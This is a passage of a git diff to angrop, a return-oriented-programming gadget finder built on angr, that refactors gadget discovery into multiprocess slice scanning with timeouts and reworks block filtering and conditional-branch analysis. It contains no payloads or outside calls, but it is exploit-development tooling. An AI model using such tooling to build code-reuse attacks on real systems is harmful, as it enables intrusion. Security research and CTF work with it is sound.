logging.getLogger('angr.engines.vex.expressions.ccall').setLevel(logging.CRITICAL) logging.getLogger('angr.engines.vex.irop').setLevel(logging.CRITICAL) - logging.getLogger('angr.state_plugins.symbolic_memory').setLevel(logging.CRITICAL) logging.getLogger('pyvex.lifting.libvex').setLevel(logging.CRITICAL) - logging.getLogger('angr.procedures.cgc.deallocate').setLevel(logging.CRITICAL) + logging.getLogger('angr.state_plugins.symbolic_memory').setLevel(logging.CRITICAL) + logging.getLogger('angr.state_plugins.posix').setLevel(logging.CRITICAL) + logging.getLogger('angr.procedures').setLevel(logging.CRITICAL) @property def gadget_analyzer(self): @@ -100,10 +134,10 @@ def gadget_analyzer(self): def _initialize_gadget_analyzer(self): - if self.kernel_mode: + if self.kernel_mode or not self.only_check_near_rets: self._syscall_locations = [] else: - self._syscall_locations = self._get_syscall_locations_by_string() + self._syscall_locations = self._get_syscall_locations() # find locations to analyze if self.only_check_near_rets and not self._ret_locations: @@ -127,7 +161,9 @@ def _initialize_gadget_analyzer(self): num_to_check, self.arch.max_block_size) self._gadget_analyzer = gadget_analyzer.GadgetAnalyzer(self.project, self.fast_mode, arch=self.arch, - kernel_mode=self.kernel_mode, stack_gsize=self.stack_gsize) + kernel_mode=self.kernel_mode, + stack_gsize=self.stack_gsize, + cond_br=self.cond_br, max_bb_cnt=self.max_bb_cnt) def analyze_gadget(self, addr, allow_conditional_branches=None): g = self.gadget_analyzer.analyze_gadget(addr, allow_conditional_branches=allow_conditional_branches) @@ -138,27 +174,109 @@ def analyze_gadget(self, addr, allow_conditional_branches=None): g.project = self.project return g - def analyze_gadget_list(self, addr_list, processes=4, show_progress=True): - gadgets = [] + def _truncated_slices(self): + for cslice in self._slices_to_check(): + size = cslice[1] - cslice[0] + 1 + if size <= 0x100: + yield cslice + continue + while cslice[1] - cslice[0] + 1 > 0x100: + new = (cslice[0], cslice[0]+0xff) + cslice = (cslice[0]+0x100, cslice[1]) + yield new + yield cslice - initargs = (self.gadget_analyzer,) - iterable = addr_list + def _multiprocess_static_analysis(self, processes, show_progress, timeout): + """ + use multiprocessing to build the cache + """ + start = time.time() + task_len = self._num_addresses_to_check() + todos = [] + + t = None if show_progress: - iterable = tqdm.tqdm(iterable=iterable, smoothing=0, total=len(addr_list), - desc="ROP", maxinterval=0.5, dynamic_ncols=True) + t = tqdm.tqdm(smoothing=0, total=task_len, desc="ROP", maxinterval=0.5, dynamic_ncols=True) - func = partial(run_worker, allow_cond_branch=False) - with Pool(processes=processes, initializer=_set_global_gadget_analyzer, initargs=initargs) as pool: - it = pool.imap_unordered(func, iterable, chunksize=1) - for gs in it: - if gs: - gadgets += gs + initargs = (self.gadget_analyzer,) + with mp.Pool(processes=processes, initializer=_set_global_gadget_analyzer, initargs=initargs) as pool: + for n, results in pool.imap_unordered(worker_func1, self._truncated_slices(), chunksize=40): + if t: + t.update(n) + for addr, h in results: + if addr is None: + continue + if h: + if h in self._cache: + self._cache[h].add(addr) + else: + self._cache[h] = {addr} + todos.append(addr) + else: + todos.append(addr) + if timeout is not None and time.time() - start > timeout: + break + + remaining = None + if timeout is not None: + remaining = timeout - (time.time() - start) + return todos, remaining + + def _analyze_gadgets_multiprocess(self, processes, tasks, show_progress, timeout, cond_br): + gadgets = [] + start = time.time() + + # select the target function + if cond_br is not None: + func = partial(worker_func2, cond_br=cond_br) + else: + func = worker_func2 + + # the progress bar + t = None + if show_progress: + t = tqdm.tqdm(smoothing=0, total=len(tasks), desc="ROP", maxinterval=0.5, dynamic_ncols=True) + + # prep for the main loop + sync_data = [time.time(), 0] + def on_success(gs): + gadgets.extend(gs) + if t: + t.update(1) + sync_data[0] = time.time() + sync_data[1] += 1 + + # the main loop + initargs = (self.gadget_analyzer,) + with mp.Pool(processes=processes, initializer=_set_global_gadget_analyzer, initargs=initargs) as pool: + for addr in tasks: + pool.apply_async(func, args=(addr,), callback=on_success) + pool.close() + + def should_continue(): + if sync_data[1] == len(tasks): + return False + if sync_data[1] > len(tasks)*0.8: + return time.time() - sync_data[0] < ANALYZE_GADGET_TIMEOUT + return time.time() - sync_data[0] < ANALYZE_GADGET_TIMEOUT*5 + + while should_continue(): + if timeout and time.time() - start > timeout: + break + time.sleep(0.1) + + pool.terminate() + if t is not None: + t.close() for g in gadgets: g.project = self.project return sorted(gadgets, key=lambda x: x.addr) + def analyze_gadget_list(self, addr_list, processes=4, show_progress=True): + return self._analyze_gadgets_multiprocess(processes, addr_list, show_progress, None, False) + def get_duplicates(self): """ return duplicates that have been seen at least twice @@ -166,32 +284,13 @@ def get_duplicates(self): cache = self._cache return {k:v for k,v in cache.items() if len(v) >= 2} - def find_gadgets(self, processes=4, show_progress=True): + def find_gadgets(self, processes=4, show_progress=True, timeout=None): + assert self.gadget_analyzer is not None self._cache = {} - - initargs = (self.gadget_analyzer,) - with Pool( - processes=processes, - initializer=_set_global_gadget_analyzer, - initargs=initargs, - # There is some kind of memory leak issue involving z3, - # so we periodically restart the worker processes. - maxtasksperchild=64, - ) as pool: - gadgets = list( - itertools.chain.from_iterable( - pool.imap_unordered( - run_worker, - self._addresses_to_check_with_caching(show_progress), - chunksize=5, - ) - ) - ) - - for g in gadgets: - g.project = self.project - - return sorted(gadgets, key=lambda x: x.addr), self.get_duplicates() + timeout1 = timeout/2 if timeout is not None else None + tasks, remaining = self._multiprocess_static_analysis(processes, show_progress, timeout1) + timeout = remaining+timeout/2 if timeout is not None else None + return self._analyze_gadgets_multiprocess(processes, tasks, show_progress, timeout, None), self.get_duplicates() def find_gadgets_single_threaded(self, show_progress=True): gadgets = [] @@ -213,78 +312,158 @@ def find_gadgets_single_threaded(self, show_progress=True): return sorted(gadgets, key=lambda x: x.addr), self.get_duplicates() - def _block_has_ip_relative(self, addr, bl): + #### generate addresses from slices #### + @staticmethod + def _addr_block_in_cache(analyzer, loc, skip_cache, cache): """ - Checks if a block has any ip relative instructions + To avoid loading the block, we first check if the data that we would + disassemble is already in the cache first """ - # if thumb mode, the block needs to parsed very carefully - if addr & 1 == 1 and self.project.arch.bits == 32 and self.project.arch.name.startswith('ARM'): - # thumb mode has this conditional instruction thingy, which is terrible for vex statement - # comparison. We inject a ton of fake statements into the program to ensure vex that this gadget - # is not a conditional instruction - MMAP_ADDR = 0x1000 - test_addr = MMAP_ADDR + 0x200+1 - if self.project.loader.memory.min_addr > MMAP_ADDR: - # a ton of `pop {pc}` - self.project.loader.memory.add_backer(MMAP_ADDR, b'\x00\xbd'*0x100+b'\x00'*0x200) - - # create the block without using the cache - engine = self.project.factory.default_engine - bk = engine._use_cache - engine._use_cache = False - self.project.loader.memory.store(test_addr-1, bl.bytes + b'\x00'*(0x200-len(bl.bytes))) - bl2 = self.project.factory.block(test_addr) - engine._use_cache = bk - else: - test_addr = 0x41414140 + addr % 0x10 - bl2 = self.project.factory.block(test_addr, insn_bytes=bl.bytes) - - # now diff the blocks to see whether anything constants changes - try: - diff_constants = differing_constants(bl, bl2) - except UnmatchedStatementsException: - return True - # check if it changes if we move it - bl_end = addr + bl.size - bl2_end = test_addr + bl2.size - filtered_diffs = [] - for d in diff_constants: - if d.value_a < addr or d.value_a >= bl_end or \ - d.value_b < test_addr or d.value_b >= bl2_end: - filtered_diffs.append(d) - return len(filtered_diffs) > 0 + data = analyzer.project.loader.memory.load(loc, analyzer.arch.max_block_size) + align = analyzer.arch.alignment + for i in range(align, len(data)+1, align): + h = data[0:i] + if h in skip_cache or h in cache: + return True + return False - def _addresses_to_check_with_caching(self, show_progress=True): - num_addrs = self._num_addresses_to_check() + @staticmethod + def _addresses_from_slice(analyzer, cslice, skip_cache, cache, it): + offset = 1 if isinstance(analyzer.arch, ARM) and analyzer.arch.is_thumb else 0 + alignment = analyzer.arch.alignment + max_block_size = analyzer.arch.max_block_size + + def do_update(): + if it is not None: + it.update(1) + + skip_addrs = set() + simple_cache = set() + for addr in range(cslice[0], cslice[1]+1, alignment): + # when loading from memory, use loc + # when calling block, use addr + loc = addr + addr += offset # this is the actual address + + if addr in skip_addrs: + do_update() + continue - iterable = self._addresses_to_check() - if show_progress: - iterable = tqdm.tqdm(iterable=iterable, smoothing=0, total=num_addrs, - desc="ROP", maxinterval=0.5, dynamic_ncols=True) + if GadgetFinder._addr_block_in_cache(analyzer, loc, skip_cache, cache): + do_update() + continue - for a in iterable: try: - bl = self.project.factory.block(a) - if bl.size > self.arch.max_block_size: - continue + bl = analyzer.project.factory.block(addr, skip_stmts=True, max_size=analyzer.arch.max_block_size+0x10) except (SimEngineError, SimMemoryError): + do_update() + continue + # check size + if bl.size > max_block_size: + for ins_addr in bl.instruction_addrs: + size = bl.size-(ins_addr-addr) + if size > max_block_size: + skip_addrs.add(ins_addr) + do_update() continue - if self._is_simple_gadget(a, bl): - h = self.block_hash(bl) - if h not in self._cache: - self._cache[h] = {a} + # check jumpkind + jumpkind = bl.vex_nostmt.jumpkind + if jumpkind == 'Ijk_NoDecode': + do_update() + continue + if jumpkind in ('Ijk_SigTRAP', 'Ijk_Privileged', 'Ijk_Yield'): + for ins_addr in bl.instruction_addrs: + bad = bl.bytes[ins_addr-addr:] + skip_cache.add(bad) + skip_addrs.add(ins_addr) + do_update() + continue + if analyzer._fast_mode and jumpkind not in ("Ijk_Ret", "Ijk_Boring") and \ + not jumpkind.startswith('Ijk_Sys_'): + for ins_addr in bl.instruction_addrs: + bad = bl.bytes[ins_addr-addr:] + skip_cache.add(bad) + skip_addrs.add(ins_addr) + do_update() + continue + # check conditional jumps + if not analyzer._allow_conditional_branches and len(bl.vex_nostmt.constant_jump_targets) > 1: + for ins_addr in bl.instruction_addrs: + bad = bl.bytes[ins_addr-addr:] + skip_cache.add(bad) + skip_addrs.add(ins_addr) + do_update() + continue + # make sure all the jump targets are valid + valid = True + for target in bl.vex_nostmt.constant_jump_targets: + if analyzer.project.loader.find_segment_containing(target) is None: + valid = False + if not valid: + for ins_addr in bl.instruction_addrs: + skip_addrs.add(ins_addr) + do_update() + continue + + # it doesn't make sense to include a gadget that starts with a jump or call + # the jump target itself will be the gadget + if bl.vex_nostmt.instructions == 1 and jumpkind in ('Ijk_Boring', 'Ijk_Call'): + do_update() + continue + + ####### use vex ######## + if not analyzer._block_make_sense_vex(bl) or not analyzer._block_make_sense_sym_access(bl) or \ + not analyzer.arch.block_make_sense(bl): + do_update() + continue + if not bl.capstone.insns: + do_update() + continue + + # we only analyze simple gadgets once + h = None + if addr in simple_cache or analyzer._is_simple_gadget(addr, bl): + # if a block is simple, all aligned sub blocks are simple + for ins_addr in bl.instruction_addrs: + simple_cache.add(ins_addr) + h = analyzer.block_hash(bl) + if h not in cache: + cache[h] = {addr} else: - # we only return the first unique gadget - # so skip duplicates - self._cache[h].add(a) - continue - yield a + cache[h].add(addr) + elif jumpkind.startswith("Ijk_Sys_"): + h = analyzer.block_hash(bl) + else: + s = '' + for insn in bl.capstone.insns: + s += insn.mnemonic + '\t' + insn.op_str + '\n' + h = hash(s) + do_update() + yield addr, h + + def _addresses_to_check_with_caching(self, show_progress=True): + """ + The goal of this function is to do a fast check of the block + only jumpkind, jump targets check and cache the result to avoid the need of symbolically + analyzing a ton of gadget candidates + """ + num_addrs = self._num_addresses_to_check() + + it = None + if show_progress: + it = tqdm.tqdm(smoothing=0, total=num_addrs, + desc="ROP", maxinterval=0.5, dynamic_ncols=True) + self._cache = {} + skip_cache = set() # bytes to skip + for cslice in self._slices_to_check(): + for addr, _ in self._addresses_from_slice(self.gadget_analyzer, cslice, skip_cache, self._cache, it): + yield addr def block_hash(self, block): """ a hash to uniquely identify a simple block """ - if block.vex.jumpkind == 'Ijk_Sys_syscall': + if block.vex.jumpkind.startswith('Ijk_Sys_'): next_addr = block.addr + block.size obj = self.project.loader.find_object_containing(next_addr) if not obj: @@ -293,6 +472,7 @@ def block_hash(self, block): return block.bytes + next_block.bytes return block.bytes + #### generate slices to analyze #### def _get_executable_ranges(self): """ returns the ranges which are executable @@ -325,55 +505,105 @@ def _addr_in_executable_memory(self, addr): return True return False - def _addresses_to_check(self): + def _find_executable_range(self, addr): + for r in self._get_executable_ranges(): + if r.contains_addr(addr): + return r + return None + + def _get_slice_by_addr(self, addr, blocksize): + start = addr - blocksize + end = addr + seg = self._find_executable_range(addr) + assert seg is not None + start = max(start, seg.min_addr) + return (start, end) + + @staticmethod + def merge_slices(slices): """ - :return: all the addresses to check + generate a list of slices that don't overlap + """ + if not slices: + return [] + + # sort by start of each slice + slices.sort(key=lambda x: x[0]) + + merged = [slices[0]] + for current in slices[1:]: + last = merged[-1] + if current[0] <= last[1]: # overlapping + merged[-1] = (last[0], max(last[1], current[1])) # merge + else: + merged.append(current) + return merged + + def _slices_to_check(self, do_sort=True): + """ + :return: all the slices to check, slice is inclusive: [start, end] """ - # align block size alignment = self.arch.alignment - offset = 1 if isinstance(self.arch, ARM) and self.arch.is_thumb else 0 + blocksize = (self.arch.max_block_size & ((1 << self.project.arch.bits) - alignment)) + alignment + if self.only_check_near_rets: - block_size = (self.arch.max_block_size & ((1 << self.project.arch.bits) - alignment)) + alignment - slices = [(addr-block_size, addr) for addr in self._ret_locations] - current_addr = 0 - for st, _ in slices: - current_addr = max(current_addr, st) - end_addr = st + block_size + alignment - for i in range(current_addr, end_addr, alignment): - if self._addr_in_executable_memory(i): - yield i+offset - current_addr = max(current_addr, end_addr) + slices = [] + if not self.arch.kernel_mode and self._syscall_locations: + slices += [self._get_slice_by_addr(addr, blocksize) for addr in self._syscall_locations] + if self._ret_locations: + slices += [self._get_slice_by_addr(addr, blocksize) for addr in self._ret_locations] + + # avoid decoding one address multiple times + slices = self.merge_slices(slices) + if not do_sort: + yield from slices + return + + # prioritize syscalls, so we still have syscall gadgets even if we timeout during gadget analysis + start = time.time() + syscall_locations = sorted(list(self._syscall_locations)) + slices1 = [] + for s in slices: + if not syscall_locations: + break + loc = syscall_locations[0] + if s[0] <= loc <= s[1]: + slices1.append(s) + for idx in range(1, len(syscall_locations)): + if s[0] <= syscall_locations[idx] <= s[1]: + continue + break + else: + break + syscall_locations = syscall_locations[idx:] + slices2 = [s for s in slices if s not in slices1] + + yield from slices1 + slices2 else: - for addr in self._syscall_locations: - yield addr+offset for segment in self._get_executable_ranges(): - l.debug("Analyzing segment with address range: 0x%x, 0x%x", segment.min_addr, segment.max_addr) start = alignment * ((segment.min_addr + alignment - 1) // alignment) - for addr in range(start, start+segment.memsize, alignment): - yield addr+offset + end = segment.min_addr + segment.memsize + end -= end % alignment + end -= alignment # a slice is inclusive + yield (start, end) def _num_addresses_to_check(self): - if self.only_check_near_rets: - # TODO: This could probably be optimized further by fewer segments checks (i.e. iterating for segments and - # adding ranges instead of incrementing, instead of calling _addressses_to_check) although this is still a - # significant improvement. - return sum(1 for _ in self._addresses_to_check()) - else: - num = 0 - alignment = self.arch.alignment - for segment in self._get_executable_ranges(): - num += segment.memsize // alignment - return num + len(self._syscall_locations) + cnt = 0 + for cslice in self._slices_to_check(do_sort=False): + cnt += cslice[1] - cslice[0] + 1 + return cnt + #### identify ret/syscall locations #### def _get_ret_locations(self): """ :return: all the locations in the binary with a ret instruction """ - try: - return self._get_ret_locations_by_string() - except RopException: - pass + if self.arch.ret_insts: + return self._get_locations_by_strings(self.arch.ret_insts) + + l.warning("Only have ret strings for i386/amd64/aarch64/riscv") + l.warning("now start the slow path for identifying gadgets end with 'ret'") addrs = [] seen = set() @@ -403,22 +633,13 @@ def _get_ret_locations(self): return sorted(addrs) - def _get_ret_locations_by_string(self): - """ - uses a string filter to find the return instructions - :return: all the locations in the binary with a ret instruction - """ - if not self.arch.ret_insts: - raise RopException("Only have ret strings for i386/x86_64/aarch64") - return self._get_locations_by_strings(self.arch.ret_insts) - - def _get_syscall_locations_by_string(self): + def _get_syscall_locations(self): """ uses a string filter to find all the system calls instructions :return: all the locations in the binary with a system call instruction """ if not self.arch.syscall_insts: - l.warning("Only have syscall strings for i386 and x86_64") + l.warning("Only have syscall strings for i386/amd64/mips, fail to identify syscall strings") return [] return self._get_locations_by_strings(self.arch.syscall_insts) @@ -426,27 +647,8 @@ def _get_locations_by_strings(self, strings): fmt = b'(' + b')|('.join(strings) + b')' addrs = [] - state = self.project.factory.entry_state() for segment in self._get_executable_ranges(): - # angr is slow to read huge chunks - read_bytes = [] - for i in range(segment.min_addr, segment.min_addr+segment.memsize, 0x100): - read_size = min(0x100, segment.min_addr+segment.memsize-i) - read_bytes.append(state.solver.eval(state.memory.load(i, read_size), cast_to=bytes)) - read_bytes = b"".join(read_bytes) + read_bytes = self.project.loader.memory.load(segment.min_addr, segment.memsize) # find all occurrences of the ret_instructions addrs += [segment.min_addr + m.start() for m in re.finditer(fmt, read_bytes)] return sorted(addrs) - - def _is_simple_gadget(self, addr, block): - """ - is the gadget a simple gadget like - pop rax; ret - """ - if block.vex.jumpkind not in {'Ijk_Boring', 'Ijk_Call', 'Ijk_Ret', 'Ijk_Sys_syscall'}: - return False - if block.vex.constant_jump_targets: - return False - if self._block_has_ip_relative(addr, block): - return False - return True diff --git a/angrop/gadget_finder/gadget_analyzer.py b/angrop/gadget_finder/gadget_analyzer.py index 738397c7..7671ca28 100644 --- a/angrop/gadget_finder/gadget_analyzer.py +++ b/angrop/gadget_finder/gadget_analyzer.py @@ -1,14 +1,20 @@ +import math import ctypes import logging +import itertools from collections import defaultdict import angr import pyvex import claripy +from angr.analyses.bindiff import differing_constants +from angr.analyses.bindiff import UnmatchedStatementsException +from angr.errors import SimEngineError, SimMemoryError from .. import rop_utils from ..arch import get_arch, X86 -from ..rop_gadget import RopGadget, RopMemAccess, RopRegMove, PivotGadget, SyscallGadget +from ..rop_gadget import RopGadget, PivotGadget, SyscallGadget +from ..rop_effect import RopMemAccess, RopRegMove, RopRegPop from ..rop_block import RopBlock from ..errors import RopException, RegNotFoundException, RopTimeoutException @@ -19,7 +25,7 @@ class GadgetAnalyzer: """ find and analyze gadgets from binary code """ - def __init__(self, project, fast_mode, kernel_mode=False, arch=None, stack_gsize=80): + def __init__(self, project, fast_mode, kernel_mode=False, arch=None, stack_gsize=80, cond_br=False, max_bb_cnt=2): """ stack_gsize: number of controllable gadgets on the stack """ @@ -27,19 +33,18 @@ def __init__(self, project, fast_mode, kernel_mode=False, arch=None, stack_gsize self.project = project self.arch = get_arch(project, kernel_mode=kernel_mode) if arch is None else arch self._fast_mode = fast_mode - self._allow_conditional_branches = not self._fast_mode + self._allow_conditional_branches = cond_br + self._max_bb_cnt = max_bb_cnt # initial state that others are based off, all analysis should copy the state first and work on # the copied state self._stack_bsize = stack_gsize * self.project.arch.bytes # number of controllable bytes on stack - sym_reg_set = self.arch.reg_set.union({self.arch.base_pointer}) if isinstance(self.arch, X86): extra_reg_set = self.arch.segment_regs else: extra_reg_set = None - self._state = rop_utils.make_symbolic_state(self.project, sym_reg_set, - extra_reg_set=extra_reg_set, stack_gsize=stack_gsize, - fast_mode=self._fast_mode) + self._state = rop_utils.make_symbolic_state(self.project, self.arch.reg_list, stack_gsize, + extra_reg_set=extra_reg_set, symbolize_got=True) self._concrete_sp = self._state.solver.eval(self._state.regs.sp) def analyze_gadget(self, addr, allow_conditional_branches=None) -> list[RopGadget] | RopGadget | None: @@ -95,7 +100,7 @@ def filter_func(state): return simgr.DROP return None - simgr.run(n=2, filter_func=filter_func) + simgr.run(n=self._max_bb_cnt, filter_func=filter_func) simgr.move(from_stash='active', to_stash='syscall', filter_func=lambda s: rop_utils.is_in_kernel(self.project, s)) @@ -109,6 +114,8 @@ def filter_func(state): return [], [] except RopTimeoutException: return [], [] + except (ctypes.ArgumentError, RecursionError): + return [], [] final_states = list(simgr.unconstrained) if "syscall" in simgr.stashes: @@ -124,7 +131,7 @@ def _analyze_gadget(self, addr, allow_conditional_branches): # Step 1: first statically check if the block can reach stopping states # static analysis is much faster - if not self._can_reach_stopping_states(addr, allow_conditional_branches): + if not self._can_reach_stopping_states(addr, allow_conditional_branches, max_steps=self._max_bb_cnt): return [] # Step 2: get all potential successor states @@ -170,7 +177,7 @@ def _analyze_gadget(self, addr, allow_conditional_branches): continue except (angr.errors.AngrError, angr.errors.AngrRuntimeError, angr.errors.SimError): continue - except ctypes.ArgumentError as e: + except (ctypes.ArgumentError, RecursionError): continue return gadgets @@ -178,6 +185,10 @@ def _analyze_gadget(self, addr, allow_conditional_branches): def _valid_state(self, init_state, final_state): if self._change_arch_state(init_state, final_state): return False + # stack change is too large + if not final_state.regs.sp.symbolic and \ + final_state.regs.sp.concrete_value - self._concrete_sp > self._stack_bsize: + return False return True def _change_arch_state(self, init_state, final_state): @@ -190,47 +201,89 @@ def _change_arch_state(self, init_state, final_state): return True return False - def _block_make_sense(self, addr): - """ - Checks if a block at addr makes sense to analyze for rop gadgets - :param addr: the address to check - :return: True or False - """ - try: - l.debug("... checking if block makes sense") - block = self.project.factory.block(addr) - - if not block.capstone.insns: - return False - - if not self.arch.block_make_sense(block): + def _block_make_sense_nostmt(self, block): + if block.size > self.arch.max_block_size: + l.debug("... too long") + return False + if block.vex.jumpkind in ('Ijk_SigTRAP', 'Ijk_NoDecode', 'Ijk_Privileged', 'Ijk_Yield'): + l.debug("... not decodable") + return False + for target in block.vex.constant_jump_targets: + if self.project.loader.find_segment_containing(target) is None: return False - - if block.vex.jumpkind == 'Ijk_NoDecode': - l.debug("... not decodable") + if self._fast_mode: + if block.vex.jumpkind != "Ijk_Ret" and not block.vex.jumpkind.startswith("Ijk_Sys"): return False + return True - if self._fast_mode: - if block.vex.jumpkind != "Ijk_Ret" and not block.vex.jumpkind.startswith("Ijk_Sys"): - return False + def _block_make_sense_vex(self, block): + # we don't like floating point and SIMD stuff + if any(t in block.vex.tyenv.types for t in ('Ity_F16', 'Ity_F32', 'Ity_F64', 'Ity_F128', 'Ity_V128')): + return False - if any(isinstance(s, pyvex.IRStmt.Dirty) for s in block.vex.statements): - l.debug("... has dirties that we probably can't handle") - return False + if any(isinstance(s, pyvex.IRStmt.Dirty) for s in block.vex.statements): + l.debug("... has dirties that we probably can't handle") + return False - for op in block.vex.operations: - if op.startswith("Iop_Div"): - return False + # make sure all constant memory accesses are in-bound + for expr in block.vex.expressions: + if expr.tag in ('Iex_Load', 'Ist_Store'): + if isinstance(expr.addr, pyvex.expr.Const): + if self.project.loader.find_segment_containing(expr.addr.con.value) is None: + return False - if block.size > self.arch.max_block_size: - l.debug("... too long") + for op in block.vex.operations: + if op.startswith("Iop_Div"): return False - # we don't like floating point stuff - if "Ity_F16" in block.vex.tyenv.types or "Ity_F32" in block.vex.tyenv.types \ - or "Ity_F64" in block.vex.tyenv.types or "Ity_F128" in block.vex.tyenv.types: - return False + return True + + def _block_make_sense_sym_access(self, block): + # make sure there are not too many symbolic accesses + # note that we can't actually distinguish between memory accesses on stack + # and other memory accesses, we just assume all non-word access are symbolic memory accesses + # consider at most one access each instruction + + # split statements by instructions + accesses = set() + word_ty = f'Ity_I{self.project.arch.bits}' + insts = [] + inst = [] + for stmt in block.vex.statements: + if isinstance(stmt, pyvex.stmt.IMark): + insts.append(inst) + inst = [] + else: + inst.append(stmt) + if inst: + insts.append(inst) + # count memory accesses + for inst in insts: + exprs = itertools.chain(*[x.expressions for x in inst]) + for expr in exprs: + if expr.tag not in ('Iex_Load', 'Ist_Store'): + continue + if isinstance(expr.addr, pyvex.expr.Const): + continue + if expr.ty == word_ty: + continue + accesses.add(str(expr.addr)) + break + if len(accesses) > self.arch.max_sym_mem_access: + return False + return True + def _block_make_sense(self, addr): + """ + Checks if a block at addr makes sense to analyze for rop gadgets + :param addr: the address to check + :return: True or False + """ + if self.project.loader.find_object_containing(addr) != self.project.loader.main_object: + return False + try: + l.debug("... checking if block makes sense") + block = self.project.factory.block(addr) except angr.errors.SimEngineError: l.debug("... some simengine error") return False @@ -253,6 +306,20 @@ def _block_make_sense(self, addr): except KeyError: return False + if not self._block_make_sense_nostmt(block): + return False + if not self._block_make_sense_vex(block): + return False + if not self._block_make_sense_sym_access(block): + return False + + if not self.arch.block_make_sense(block): + return False + + if not block.capstone.insns: + return False + + return True def is_in_kernel(self, state): @@ -270,6 +337,13 @@ def _can_reach_stopping_states(self, addr, allow_conditional_branches, max_steps return False b = self.project.factory.block(addr) + + if max_steps == self._max_bb_cnt: # this is the very first basic block + # it doesn't make sense to have a gadget that starts with a conditional jump + # this type of gadgets should be represented by two gadgets after the jump + if b._instructions == 1 and len(b.vex.constant_jump_targets) > 1: + return False + constant_jump_targets = list(b.vex.constant_jump_targets) if not constant_jump_targets: @@ -341,13 +415,21 @@ def _effect_analysis(self, gadget, init_state, final_state, ctrl_type, do_cond_b if gadget.pc_offset >= gadget.stack_change: return None case 'jmp_reg': # record pc_reg + # TODO: we should support gadgets like `add rax, 0x1000; call rax` + # use test_chainbuilder.test_normalize_call as the testcase + if final_state.ip.depth > 1: + return None gadget.pc_reg = list(final_state.ip.variables)[0].split('_', 1)[1].rsplit('-')[0] case 'jmp_mem': # record pc_target + # TODO: we currently don't support jmp_mem gadgets that look like + # pop rax; pop rbx; jmp [rax+rbx] for a in reversed(final_state.history.actions): if a.type == 'mem' and a.action == 'read' and a.size == arch_bits: if (a.data.ast == final_state.ip).is_true(): gadget.pc_target = a.addr.ast break + if gadget.pc_target is None: + return None # register effect analysis l.info("... checking for controlled regs") @@ -355,7 +437,8 @@ def _effect_analysis(self, gadget, init_state, final_state, ctrl_type, do_cond_b l.debug("... checking for reg moves") self._check_reg_change_dependencies(init_state, final_state, gadget) self._check_reg_movers(init_state, final_state, gadget) - self._analyze_concrete_regs(init_state, final_state, gadget) + self._analyze_concrete_regs(final_state, gadget) + self._check_pop_equal_set(gadget, final_state) # memory access analysis l.debug("... analyzing mem accesses") @@ -373,35 +456,63 @@ def _effect_analysis(self, gadget, init_state, final_state, ctrl_type, do_cond_b # conditional branch analysis if do_cond_branch: - constraint_vars = { - var - for constraint in final_state.history.jump_guards - for var in constraint.variables - } - - gadget.has_conditional_branch = len(constraint_vars) > 0 - - for action in final_state.history.actions: - if action.type == 'mem': - constraint_vars |= action.addr.variables - - for var in constraint_vars: - if var.startswith("sreg_"): - gadget.constraint_regs.add(var.split('_', 1)[1].split('-', 1)[0]) - elif not var.startswith("symbolic_stack_"): - l.debug("... constraint not controlled by registers and stack") - return None + gadget = self._cond_branch_analysis(gadget, final_state) + return gadget - gadget.popped_regs = { - reg - for reg in gadget.popped_regs - if final_state.registers.load(reg).variables.isdisjoint(constraint_vars) - } + @staticmethod + def _cond_branch_analysis(gadget, final_state): + # list all conditional branch dependencies + branch_guards = set() + branch_guard_vars = set() + for guard in final_state.history.jump_guards: + if claripy.is_true(guard): + continue + branch_guards.add(guard) + branch_guard_vars |= guard.variables + + # make sure all guards are controllable by us + for var in branch_guard_vars: + if var.startswith('sreg_') or var.startswith('symbolic_stack_'): + continue + return None - gadget.popped_reg_vars = { - reg: final_state.registers.load(reg).variables - for reg in gadget.popped_regs - } + # we do not consider a gadget having conditional branch if the branch guards can be set by itself + gadget.has_conditional_branch = any(not v.startswith('symbolic_stack_') for v in branch_guard_vars) + #gadget.has_conditional_branch = any(not v.startswith('symbolic_stack_') for v in branch_guard_vars) + + # if there is no conditional branch, good, we just finished the analysis + if not branch_guards: + return gadget + + # now analyze the branch dependencies and filter out gadgets that we do not support yet + # TODO: support more guards such as existing flags + def handle_constrained_var(var): + if var.startswith("sreg_"): + gadget.branch_dependencies.add(var.split('_', 1)[1].split('-', 1)[0]) + elif var.startswith("symbolic_stack_"): + # we definitely can control this, but remove it from reg_pops + to_remove = set() + for pop in gadget.reg_pops: + reg = pop.reg + reg_val = final_state.registers.load(reg) + if var in reg_val.variables: + to_remove.add(pop) + gadget.reg_pops -= to_remove + + for guard in branch_guards: + if len(guard.variables) > 1: + for var in guard.variables: + handle_constrained_var(var) + else: + var = list(guard.variables)[0] + arg0 = guard.args[0] + arg1 = guard.args[1] + ast = arg0 if arg0.symbolic else arg1 + if rop_utils.loose_constrained_check(final_state, ast, extra_constraints=[guard]): + if var.startswith("sreg_"): + gadget.branch_dependencies.add(var.split('_', 1)[1].split('-', 1)[0]) + continue + handle_constrained_var(var) return gadget @@ -411,7 +522,13 @@ def _create_gadget(self, addr, init_state, final_state, ctrl_type, do_cond_branc # gadgets that do syscall and pivoting are too complicated if self._does_pivot(final_state): return None - prologue_state = rop_utils.step_to_syscall(init_state) + + # FIXME: this try-except here is specifically for MIPS because angr + # does not handle breakpoints in MIPS well + try: + prologue_state = rop_utils.step_to_syscall(init_state) + except RuntimeError: + return None g = RopGadget(addr=addr) if init_state.addr != prologue_state.addr: self._effect_analysis(g, init_state, prologue_state, None, do_cond_branch) @@ -425,21 +542,17 @@ def _create_gadget(self, addr, init_state, final_state, ctrl_type, do_cond_branc gadget = self._effect_analysis(gadget, init_state, final_state, ctrl_type, do_cond_branch) return gadget - def _analyze_concrete_regs(self, init_state, final_state, gadget): + def _analyze_concrete_regs(self, final_state, gadget): """ collect registers that are concretized after symbolically executing the block (for example, xor rax, rax) """ - if type(gadget) == SyscallGadget: - state = self._windup_to_presyscall_state(final_state, init_state) - else: - state = final_state - for reg in self.arch.reg_set: - val = state.registers.load(reg) + for reg in self.arch.reg_list: + val = final_state.registers.load(reg) if val.symbolic: continue - gadget.concrete_regs[reg] = state.solver.eval(val) + gadget.concrete_regs[reg] = final_state.solver.eval(val) - def _check_reg_changes(self, final_state, init_state, gadget): + def _check_reg_changes(self, final_state, _, gadget): """ Checks which registers were changed and which ones were popped :param final_state: the stepped path, init_state is an ancestor of it. @@ -450,7 +563,7 @@ def _check_reg_changes(self, final_state, init_state, gadget): if not isinstance(exit_action, angr.state_plugins.sim_action.SimActionExit): raise RopException("unexpected SimAction") - exit_target = exit_action.target.ast + exit_target = exit_action.target.ast # type: ignore stack_change = gadget.stack_change if 